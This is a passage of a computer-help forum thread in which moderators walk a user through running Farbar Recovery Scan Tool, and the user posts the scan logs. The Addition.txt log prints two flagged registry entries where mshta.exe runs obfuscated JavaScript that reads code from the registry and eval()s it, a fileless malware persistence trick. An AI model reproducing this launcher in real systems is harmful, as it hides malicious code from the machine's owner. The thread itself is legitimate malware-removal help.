IE/ Foxfire question

  • Hilton_Heflin
    PCHF Member
    • Aug 2016
    • 134

    #16
    Originally posted by Malnutrition
    @Hilton Heflin how about an update for your helper.
    Have you had a chance to look at this ? no hurry just wondering ..
    thanks,
    hefs


    • Malnutrition
      PCHF Moderator
      • Jul 2016
      • 7045

      #17
      I suppose your helper is out of town or something. sorry for the delay… Let’s get some FRST logs, and @gus will be assisting you.

      Please run Farbar Recovery Scan Tool to give me a fresh look at your system.

      Please download the FRST 32 bit or FRST 64bit version to suit your operating system. It is important FRST is downloaded to your desktop.

      If you are unsure if your operating system is 32 or 64 Bit please go HERE.

      • Right-click on FRST icon and select Run as Administrator to start the tool. (XP users click run after receipt of Windows Security Warning - Open File).
      • Make sure that Addition option is checked, as well as Shortcut.txt
      • Press Scan button and wait.
      • The tool will produce three logfiles on your desktop: FRST.txt, and Addition.txt – & Shortcut.txt
      Please Copy & Paste them into your next reply. But attach Shortcut.txt


      • Hilton_Heflin
        PCHF Member
        • Aug 2016
        • 134

        #18
        Originally posted by Malnutrition
        I suppose your helper is out of town or something. sorry for the delay… Let’s get some FRST logs, and @gus will be assisting you.

        Please run Farbar Recovery Scan Tool to give me a fresh look at your system.

        Please download the FRST 32 bit or FRST 64bit version to suit your operating system. It is important FRST is downloaded to your desktop.

        If you are unsure if your operating system is 32 or 64 Bit please go HERE.

        • Right-click on FRST icon and select Run as Administrator to start the tool. (XP users click run after receipt of Windows Security Warning - Open File).
        • Make sure that Addition option is checked, as well as Shortcut.txt
        • Press Scan button and wait.
        • The tool will produce three logfiles on your desktop: FRST.txt, and Addition.txt – & Shortcut.txt
        Please Copy & Paste them into your next reply. But attach Shortcut.txt
        Sorry..never saw a place that said run as Adm.. I know it is a 32 bit and clicked that..box came up asking to run or save…hit run and here is what I got…they ended up in note pad..have no idea where that is..so can’t see how to send them to you..it must not be right because there were only two of them..
        You know by now you are dealing with a computer idiot
        Also got something from Gus I broke a rule..not sure what I did but apologise…

        Thanks, hefs


        • system
          PCHF Owner
          • Jan 2015
          • 7634

          #19
          Hello Hefs,
          As per the instructions above, you should have downloaded FRST to the desktop and run it (as administrator) from there. It would have then produced 3 files on the desktop
          1. FRST.txt
          2. Addition.txt
          3. Shortcut.txt
          Once you have these files please copy and paste the contents of FRST.txt and Addition.txt in your next post. Also attach Shortcut.txt
          Originally posted by Hilton Heflin
          Also got something from Gus I broke a rule..not sure what I did but apologise..
          It’s all good, your second newly created member account has been removed because you are only allowed to have one account, and making another thread about the same topic is not helpful, but rest assured we will help you get your issues sorted out(y)

          If you are unsure about any of the above instructions please give me a shout.


          • Malnutrition
            PCHF Moderator
            • Jul 2016
            • 7045

            #20
            Originally posted by Hilton Heflin
            .they ended up in note pad..have no idea where that is..so can’t see how to send them to you.
            You can attach them to the thread the same as you did the other logs.


            • Hilton_Heflin
              PCHF Member
              • Aug 2016
              • 134

              #21
              Additional scan result of Farbar Recovery Scan Tool (x86) Version: 15-03-2017
              Ran by hilton (13-04-2017 12:35:25)
              Running from C:\Users\hilton\Downloads
              Microsoft Windows 7 Professional Service Pack 1 (X86) (2016-06-29 20:30:51)
              Boot Mode: Normal
              ==================== Accounts: =============================

              Administrator (S-1-5-21-3292114827-816517840-1514174382-500 - Administrator - Disabled)
              Guest (S-1-5-21-3292114827-816517840-1514174382-501 - Limited - Disabled)
              hilton (S-1-5-21-3292114827-816517840-1514174382-1000 - Administrator - Enabled) => C:\Users\hilton
              HomeGroupUser$ (S-1-5-21-3292114827-816517840-1514174382-1002 - Limited - Enabled)

              ==================== Security Center ========================

              (If an entry is included in the fixlist, it will be removed.)

              AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
              AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
              AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
              FW: Avast Antivirus (Enabled) {B693136B-F6EE-DD1C-A0EF-229B8B0B29C4}

              ==================== Installed Programs ======================

              (Only the adware programs with “Hidden” flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

              Adobe Acrobat Reader DC (HKLM...{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
              Adobe Flash Player 25 ActiveX (HKLM...\Adobe Flash Player ActiveX) (Version: 25.0.0.148 - Adobe Systems Incorporated)
              Amazon Music (HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Amazon Amazon Music) (Version: 5.3.5.1704 - Amazon Services LLC)
              Avast Internet Security (HKLM...\Avast Antivirus) (Version: 17.3.2291 - AVAST Software)
              Canon MG3200 series MP Drivers (HKLM...{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG3200_series) (Version: - Canon Inc.)
              Canon Quick Menu (HKLM...\CanonQuickMenu) (Version: 2.7.1 - Canon Inc.)
              CCleaner (HKLM...\CCleaner) (Version: 5.28 - Piriform)
              Dell System Detect (HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\58d94f3ce2c27db0) (Version: 7.11.0.6 - Dell)
              DriverUpdate (HKLM...\DriverUpdate) (Version: 4.0.0 - Slimware Utilities Holdings, Inc.)
              DriverUpdate (Version: 4.0.0 - Slimware Utilities Holdings, Inc.) Hidden
              eM Client (HKLM...{2A4CAF55-4B18-4B61-BE9E-94A54209F547}) (Version: 7.0.27943.0 - eM Client Inc.)
              FromDocToPDF Internet Explorer Homepage and New Tab (HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\FromDocToPDFTooltab Uninstall Internet Explorer) (Version: - Mindspark Interactive Network, Inc.) <==== ATTENTION
              Google Chrome (HKLM...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
              Google Update Helper (Version: 1.3.33.3 - Google Inc.) Hidden
              Intel(R) Graphics Media Accelerator Driver (HKLM...\HDMI) (Version: 8.15.10.1930 - Intel Corporation)
              Intel(R) Management Engine Interface (HKLM...\HECI) (Version: - Intel Corporation)
              Intel(R) Network Connections 19.5.303.0 (HKLM...\PROSetDX) (Version: 19.5.303.0 - Intel)
              Intel(R) Wireless Bluetooth(R)(patch version 19.0.1629.3590) (HKLM...{302600C1-6BDF-4FD1-1603-148929CC1385}) (Version: 19.0.1603.0650 - Intel Corporation)
              Intel® Active Management Technology (HKLM...\MESOL) (Version: - Intel Corporation)
              Kodi (HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Kodi) (Version: - XBMC-Foundation)
              Microsoft .NET Framework 4.6.1 (HKLM...{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
              Microsoft Silverlight (HKLM...{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50906.0 - Microsoft Corporation)
              Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM...{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
              Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM...{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
              Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM...{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
              Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM...{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
              Mozilla Firefox 52.0 (x86 en-US) (HKLM...\Mozilla Firefox 52.0 (x86 en-US)) (Version: 52.0 - Mozilla)
              Mozilla Maintenance Service (HKLM...\MozillaMaintenanceService) (Version: 52.0.0.6270 - Mozilla)
              OpenOffice 4.1.3 (HKLM...{EEA30AEB-8BA7-465B-85D4-098BB99733E7}) (Version: 4.13.9783 - Apache Software Foundation)
              RoboForm 8-3-1-1 (All Users) (HKLM...\AI RoboForm) (Version: 8-3-1-1 - Siber Systems)
              SafeZone Stable 3.55.2393.590 (Version: 3.55.2393.590 - Avast Software) Hidden
              SafeZone Stable 3.55.2393.596 (Version: 3.55.2393.596 - Avast Software) Hidden
              Samsung USB Driver for Mobile Phones (HKLM...{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
              SoundMAX (HKLM...{F0A37341-D692-11D4-A984-009027EC0A9C}) (Version: 6.10.1.7280 - Analog Devices)
              Stardock Fences 3 (HKLM...\Stardock Fences 3) (Version: 3.03 - Stardock Software, Inc.)
              Stardock ObjectDock (HKLM...\Stardock ObjectDock) (Version: 2.20 - Stardock Software, Inc.)
              WIDCOMM Bluetooth Software (HKLM...{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.2700 - Broadcom Corporation)
              Windows Mobile Device Center (HKLM...{904CCF62-818D-4675-BC76-D37EB399F917}) (Version: 6.1.6965.0 - Microsoft Corporation)
              Windows Mobile Device Center Driver Update (HKLM...{E7044E25-3038-4A76-9064-344AC038043E}) (Version: 6.1.6965.0 - Microsoft Corporation)

              ==================== Custom CLSID (Whitelisted): ==========================

              (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

              ==================== Scheduled Tasks (Whitelisted) =============

              (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

              Task: {0FEEAAD8-76C7-4B2C-8F73-A21BB9D814D3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2016-12-25] (Google Inc.)
              Task: {224A052F-EE78-4A67-B44E-75C5338C2C0A} - System32\Tasks\SafeZone scheduled Autoupdate 1482114147 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2017-03-22] (Avast Software)
              Task: {2E1F1D2B-A7F0-47BE-9978-16429AE3489C} - System32\Tasks\Driver Support-RTMScan => C:\Program Files\Driver Support\DriverSupport.exe [2016-06-07] (PC Drivers Headquarters)
              Task: {2E451AE4-8D27-484B-B16F-D509AF77F27D} - System32\Tasks\Driver Support => C:\Program Files\Driver Support\DriverSupport.exe [2016-06-07] (PC Drivers Headquarters)
              Task: {599B1B91-94BB-47B7-B9DB-8C9A5FAB8A12} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2017-04-12] (AVAST Software)
              Task: {6782147C-F074-4313-B1B6-20D506A59457} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated)
              Task: {69879873-87A5-4A6E-947D-918B26EA1025} - System32\Tasks\Driver Support-RTMUpdater => C:\Program Files\Driver Support\DriverSupport.exe [2016-06-07] (PC Drivers Headquarters)
              Task: {7165A1B7-F1E6-4C37-BB48-9ABE90C6D3E3} - System32\Tasks\DriverUpdate Scan => C:\Program Files\DriverUpdate\DriverUpdate.exe [2016-08-01] (SlimWare Utilities, Inc.)
              Task: {9B71B164-D984-4853-BA08-95A906000F12} - System32\Tasks\Open URL by RoboForm => Rundll32.exe url.dll,FileProtocolHandler "hxxps://www.roboform.com/test-pass.html?aaa=KICMKMKMNJHMOMGMNMJJCNPMNJMJMJCNLMJM HMKMCNOJOMOJLJCNPMJJNMHMOMOJMMJJMJHMJMOJJNJICMHMCN MMCNOMFMOMOMCNPMCNGMJMPMPMFMJMCNOMCNIMJMPMOMCNNMJN PICMPMFMEKMICNJJCKFMNMHMJMJNHICMOMPMKJCJMIJNBJCMHJ GJDJLIAJBJJNKJCMJNNICMJNDJCMKJBJJNMJCMPMF (the data entry has 42 more characters).
              Task: {A432DC7B-B85A-4B9D-970A-1E7753295BF1} - System32\Tasks\Run RoboForm TaskBar Icon => C:\Program Files\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe [2017-04-12] (Siber Systems)
              Task: {ACA2CFD2-877B-4148-BCDB-579CDEBD6855} - System32\Tasks\Games\UpdateCheck_S-1-5-21-3292114827-816517840-1514174382-1000
              Task: {AEBAC022-C4BF-468A-A3B0-A99EF616D1AA} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2016-12-25] (Google Inc.)
              Task: {B65BA30C-B2B6-46F4-B376-2009DA700634} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-03-03] (Piriform Ltd)
              Task: {BF5F61F7-5B68-424F-BC5D-73C6030B203E} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-01-27] (AVAST Software)
              Task: {C24F7343-825C-44A5-A240-4432598C8B17} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2017-04-12] (Adobe Systems Incorporated)
              Task: {E572A5EE-C9B3-477C-B58F-EE074238EB6E} - System32\Tasks\DriverUpdate Startup.job => C:\Program Files\DriverUpdate\DriverUpdate.exe [2016-08-01] (SlimWare Utilities, Inc.)
              Task: {E753F27A-B7AA-4831-A49E-9186D40D7565} - System32\Tasks\Driver Support-RTMRules => C:\Program Files\Driver Support\DriverSupport.exe [2016-06-07] (PC Drivers Headquarters)

              (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

              Task: C:\Windows\Tasks\DriverUpdate Scan.job => C:\Program Files\DriverUpdate\DriverUpdate.exe

              ==================== Shortcuts =============================

              (The entries could be listed to be restored or removed.)

              ==================== Loaded Modules (Whitelisted) ==============

              2017-04-12 14:40 - 2017-04-12 14:40 - 00170216 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
              2017-04-12 14:40 - 2017-04-12 14:40 - 00176480 _____ () C:\Program Files\AVAST Software\Avast\event_routing_rpc.dll
              2017-04-12 14:40 - 2017-04-12 14:40 - 00653520 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
              2017-04-12 14:40 - 2017-04-12 14:40 - 00230632 _____ () C:\Program Files\AVAST Software\Avast\streamback.dll
              2017-04-13 07:45 - 2017-04-13 07:45 - 06015544 _____ () C:\Program Files\AVAST Software\Avast\defs\17041300\algo.dll
              2017-04-12 14:39 - 2017-04-12 14:39 - 00134920 _____ () c:\Program Files\AVAST Software\Avast\vaarclient.dll
              2017-04-12 14:40 - 2017-04-12 14:40 - 00230632 _____ () c:\Program Files\AVAST Software\Avast\StreamBack.dll
              2016-07-28 13:02 - 2016-07-28 13:02 - 00093528 _____ () C:\Program Files\DriverUpdate\CrashRpt.dll
              2016-12-18 22:20 - 2016-12-18 22:20 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
              2017-04-12 14:39 - 2017-04-12 14:39 - 00293936 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll
              2016-08-01 10:37 - 2016-08-01 10:37 - 00076120 _____ () C:\Program Files\SlimWare Utilities\Services\CrashRpt.dll

              ==================== Alternate Data Streams (Whitelisted) =========

              (If an entry is included in the fixlist, only the ADS will be removed.)

              AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.websiteESTICON_favicon-321416266 [37438]
              AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.websiteESTICON_favicon-36986836 [37438]
              AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.websiteESTICON_favicon1520975912 [37438]
              AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.websiteESTICON_favicon62545966 [37438]
              AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.websiteESTICON_favicon825986531 [37438]
              AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.websiteESTICON_Goldbox16.CB200960310-1866390539 [2814]
              AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICON_0favicon-919252660 [37438]
              AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICON_1favicon871367106 [37438]
              AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICON_2favicon717581649 [37438]
              AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICON_3favicon364977008 [37438]
              AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICON_4favicon-1245215657 [37438]
              AlternateDataStreams: C:\Users\hilton\Desktop\BING.website:TASKICON_0sm_weather-1654153164 [2302]
              AlternateDataStreams: C:\Users\hilton\Desktop\BING.website:TASKICON_1sm_news888331756 [2302]
              AlternateDataStreams: C:\Users\hilton\Desktop\BING.website:TASKICON_2sm_maps-889989894 [2302]

              ==================== Safe Mode (Whitelisted) ===================

              (If an entry is included in the fixlist, it will be removed from the registry. The “AlternateShell” value will be restored.)

              HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => “”=“”
              HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => “”=“”
              HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => “”=“”
              HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => “”=“Service”
              HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => “”=“Driver”

              ==================== Association (Whitelisted) ===============

              (If an entry is included in the fixlist, the registry item will be restored to default or removed.)

              HKU\S-1-5-21-3292114827-816517840-1514174382-1000\Software\Classes\49c4f: “C:\Windows\system32\mshta.exe” “javascript:WJc2I4C=“TtZ”;I7o0=new ActiveXObject(“WScript.Shell”);ivp77AS=“IJm09”;n30 PTY=I7o0.RegRead(“HKCU\software\jtosjykc\khzqgpmhk ”);Wdq2Upz=“eTw”;eval(n30PTY);zfuWFiF0=“36B”;” <===== ATTENTION
              HKU\S-1-5-21-3292114827-816517840-1514174382-1000\Software\Classes\89873: “C:\Windows\system32\mshta.exe” “javascript:A2FZidrE=“CPVI”;S19T=new ActiveXObject(“WScript.Shell”);phe0u=“W1NGquh”;OsT 4c0=S19T.RegRead(“HKCU\software\ovbrx\adbychucad”) ;bE4RCT=“yLuy”;eval(OsT4c0);siDwFRU9=“iAbe”;” <===== ATTENTION

              ==================== Internet Explorer trusted/restricted ===============

              (If an entry is included in the fixlist, it will be removed from the registry.)

              IE trusted site: HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\dell.com → dell.com

              ==================== Hosts content: ===============================

              (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

              2009-07-13 22:04 - 2016-07-17 14:58 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

              ==================== Other Areas ============================

              (Currently there is no automatic fix for this section.)

              HKU\S-1-5-21-3292114827-816517840-1514174382-1000\Control Panel\Desktop\Wallpaper → C:\Users\hilton\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
              DNS Servers: 209.18.47.61 - 209.18.47.62
              HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
              Windows Firewall is enabled.

              ==================== MSCONFIG/TASK MANAGER disabled items ==

              ==================== FirewallRules (Whitelisted) ===============

              (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

              FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
              FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
              FirewallRules: [{0DC8D093-6A4A-46DF-81F7-51A31BA38190}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
              FirewallRules: [TCP Query User{AC689693-B971-449C-8EA9-AC51E5D70F9C}C:\users\hilton\appdata\local\amazon music\amazon music helper.exe] => (Allow) C:\users\hilton\appdata\local\amazon music\amazon music helper.exe
              FirewallRules: [UDP Query User{25F20FE1-CB5D-4B09-9160-3C9094A6B8A8}C:\users\hilton\appdata\local\amazon music\amazon music helper.exe] => (Allow) C:\users\hilton\appdata\local\amazon music\amazon music helper.exe
              FirewallRules: [{EAD2EC74-0D35-4D3D-900E-D48B9AB5AE26}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
              FirewallRules: [{E8207517-F4F1-4084-AD6C-988A4CDC999F}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
              FirewallRules: [{8F434A18-CE8D-45DC-AD17-44370BA521AC}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.561\SZBrowser.exe
              FirewallRules: [{0941F852-CFCF-4D18-A6F8-20FE7A5ACEC5}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.596_0\SZBrowser.exe
              FirewallRules: [{30AFA8FF-C296-4B9A-AD9E-55C4A601D1BB}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe

              ==================== Restore Points =========================

              05-04-2017 00:00:04 Scheduled Checkpoint
              12-04-2017 03:00:16 Windows Update
              12-04-2017 14:06:47 Restore Operation
              12-04-2017 15:19:46 Windows Update

              ==================== Faulty Device Manager Devices =============

              Name: avast! SecureLine TAP Adapter v3
              Description: avast! SecureLine TAP Adapter v3
              Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
              Manufacturer: TAP-Windows Provider V9
              Service: aswTap
              Problem: : This device is disabled. (Code 22)
              Resolution: In Device Manager, click “Action”, and then click “Enable Device”. This starts the Enable Device wizard. Follow the instructions.

              ==================== Event log errors: =========================
              Application errors:
              Error: (04/13/2017 12:33:33 PM) (Source: LMS) (EventID: 2) (User: NT AUTHORITY)
              Description: LMS Service lost connection to HECI driver

              Error: (04/13/2017 11:10:02 AM) (Source: LMS) (EventID: 2) (User: NT AUTHORITY)
              Description: LMS Service lost connection to HECI driver

              Error: (04/13/2017 11:08:16 AM) (Source: LMS) (EventID: 2) (User: NT AUTHORITY)
              Description: LMS Service lost connection to HECI driver

              Error: (04/12/2017 04:06:07 PM) (Source: SideBySide) (EventID: 33) (User: )
              Description: Activation context generation failed for “C:\Program Files\DriverUpdate\MFC80U.DLL”.
              Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture=“x86”, publicKeyToken=“1fc8b3b9a1e18e3b”,type=“win32”,version=“8.0.50608.0” could not be found.
              Please use sxstrace.exe for detailed diagnosis.

              Error: (04/12/2017 04:05:49 PM) (Source: SideBySide) (EventID: 33) (User: )
              Description: Activation context generation failed for “C:\Program Files\DriverUpdate\MFC80U.DLL”.
              Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture=“x86”, publicKeyToken=“1fc8b3b9a1e18e3b”,type=“win32”,version=“8.0.50608.0” could not be found.
              Please use sxstrace.exe for detailed diagnosis.

              Error: (04/12/2017 04:03:30 PM) (Source: WinMgmt) (EventID: 10) (User: )
              Description: Event filter with query “SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA “Win32_Processor” AND TargetInstance.LoadPercentage > 99” could not be reactivated in namespace “//./root/CIMV2” because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

              Error: (04/12/2017 03:19:46 PM) (Source: VSS) (EventID: 8193) (User: )
              Description: Volume Shadow Copy Service error: Unexpected error calling routine ConvertStringSidToSid(S-1-5-21-3292114827-816517840-1514174382-1000.bak). hr = 0x80070539, The security ID structure is invalid.
              .

              Operation:
              OnIdentify event
              Gathering Writer Data

              Context:
              Execution Context: Shadow Copy Optimization Writer
              Writer Class Id: {4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f}
              Writer Name: Shadow Copy Optimization Writer
              Writer Instance ID: {460ea05d-9812-4601-ba62-5d80b9e346fa}

              Error: (04/12/2017 03:19:44 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1533) (User: NT AUTHORITY)
              Description: Windows cannot delete the profile directory C:\Users\TEMP. This error may be caused by files in this directory being used by another program.

              DETAIL - The directory is not empty.

              Error: (04/12/2017 03:18:15 PM) (Source: SideBySide) (EventID: 33) (User: )
              Description: Activation context generation failed for “C:\Program Files\DriverUpdate\MFC80U.DLL”.
              Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture=“x86”, publicKeyToken=“1fc8b3b9a1e18e3b”,type=“win32”,version=“8.0.50608.0” could not be found.
              Please use sxstrace.exe for detailed diagnosis.

              Error: (04/12/2017 03:18:09 PM) (Source: ESENT) (EventID: 215) (User: )
              Description: WinMail (3740) WindowsMail0: The backup has been stopped because it was halted by the client or the connection with the client failed.
              System errors:
              Error: (04/13/2017 10:34:20 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
              Description: The following fatal alert was received: 20.

              Error: (04/13/2017 10:34:13 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
              Description: The following fatal alert was received: 20.

              Error: (04/12/2017 03:18:25 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
              Description: The HomeGroup Listener service terminated with service-specific error %%-2147023143 = There are no more endpoints available from the endpoint mapper..

              Error: (04/12/2017 03:07:57 PM) (Source: Disk) (EventID: 7) (User: )
              Description: The device, \Device\Harddisk0\DR0, has a bad block.

              Error: (04/12/2017 03:07:54 PM) (Source: Disk) (EventID: 7) (User: )
              Description: The device, \Device\Harddisk0\DR0, has a bad block.

              Error: (04/12/2017 03:07:34 PM) (Source: Disk) (EventID: 7) (User: )
              Description: The device, \Device\Harddisk0\DR0, has a bad block.

              Error: (04/12/2017 03:07:31 PM) (Source: Disk) (EventID: 7) (User: )
              Description: The device, \Device\Harddisk0\DR0, has a bad block.

              Error: (04/12/2017 03:07:05 PM) (Source: Disk) (EventID: 7) (User: )
              Description: The device, \Device\Harddisk0\DR0, has a bad block.

              Error: (04/12/2017 03:07:03 PM) (Source: Disk) (EventID: 7) (User: )
              Description: The device, \Device\Harddisk0\DR0, has a bad block.

              Error: (04/12/2017 03:02:45 PM) (Source: Disk) (EventID: 7) (User: )
              Description: The device, \Device\Harddisk0\DR0, has a bad block.

              ==================== Memory info ===========================

              Processor: Intel(R) Core™2 CPU 6300 @ 1.86GHz
              Percentage of memory in use: 44%
              Total physical RAM: 3316.61 MB
              Available physical RAM: 1847.67 MB
              Total Virtual: 6631.55 MB
              Available Virtual: 5076.47 MB

              ==================== Drives ================================

              Drive c: (Windows) (Fixed) (Total:1859.99 GB) (Free:1818.73 GB) NTFS

              ==================== MBR & Partition Table ==================

              ========================================================
              Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: F9D26468)
              Partition 1: (Active) - (Size=3 GB) - (Type=27)
              Partition 2: (Not Active) - (Size=1860 GB) - (Type=07 NTFS)

              ==================== End of Addition.txt ============================
              hope this works…
              thanks
              hefs


              • system
                PCHF Owner
                • Jan 2015
                • 7634

                #22
                Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 15-03-2017
                Ran by hilton (administrator) on HILTON-PC (13-04-2017 12:34:55)
                Running from C:\Users\hilton\Downloads
                Loaded Profiles: hilton (Available Profiles: hilton)
                Platform: Microsoft Windows 7 Professional Service Pack 1 (X86) Language: English (United States)
                Internet Explorer Version 11 (Default browser: FF)
                Boot Mode: Normal
                Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic...ery-scan-tool/

                ==================== Processes (Whitelisted) =================

                (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

                (AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
                (AVAST Software) C:\Program Files\AVAST Software\Avast\afwServ.exe
                (Intel Corporation) C:\Program Files\Intel\AMT\atchksrv.exe
                (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
                (Intel Corporation) C:\Program Files\Intel\Bluetooth\ibtsiva.exe
                (Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
                (Intel) C:\Program Files\Intel\AMT\LMS.exe
                (Intel) C:\Program Files\Intel\AMT\UNS.exe
                (AVAST Software s.r.o.) C:\Program Files\AVAST Software\Avast\aswidsagent.exe
                (SlimWare Utilities, Inc.) C:\Program Files\DriverUpdate\DriverUpdate.exe
                (Intel Corporation) C:\Program Files\Intel\AMT\atchk.exe
                (Analog Devices, Inc.) C:\Program Files\Analog Devices\Core\smax4pnp.exe
                (CANON INC.) C:\Program Files\Canon\Quick Menu\CNQMMAIN.EXE
                (Microsoft Corporation) C:\Windows\WindowsMobile\wmdc.exe
                (Microsoft Corporation) C:\Windows\System32\rundll32.exe
                (AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
                (Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
                (Amazon Services LLC) C:\Users\hilton\AppData\Local\Amazon Music\Amazon Music Helper.exe
                (Dell) C:\Users\hilton\AppData\Local\Apps\2.0\3VGPG9W0.MPE\2E0VXQW4.WA5\dell..tion_6d0a76327dca4869_0007.000b_df227eeaae3cac0d\DellSystemDetect.exe
                (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
                (Motorola Solutions, Inc.) C:\Program Files\Intel\Bluetooth\devmonsrv.exe
                (Motorola Solutions, Inc.) C:\Program Files\Intel\Bluetooth\obexsrv.exe
                (Motorola Solutions, Inc.) C:\Program Files\Intel\Bluetooth\mediasrv.exe
                (Microsoft Corporation) C:\Windows\System32\rundll32.exe
                (CANON INC.) C:\Program Files\Canon\Quick Menu\CNQMUPDT.EXE
                (Google Inc.) C:\Program Files\Google\Update\1.3.33.3\GoogleCrashHandler.exe
                (SlimWare Utilities Holdings, Inc.) C:\Program Files\SlimWare Utilities\Services\SlimWare.Services.exe
                (SlimWare Utilities Holdings, Inc.) C:\Program Files\SlimWare Utilities\Services\SlimWare.Session.exe
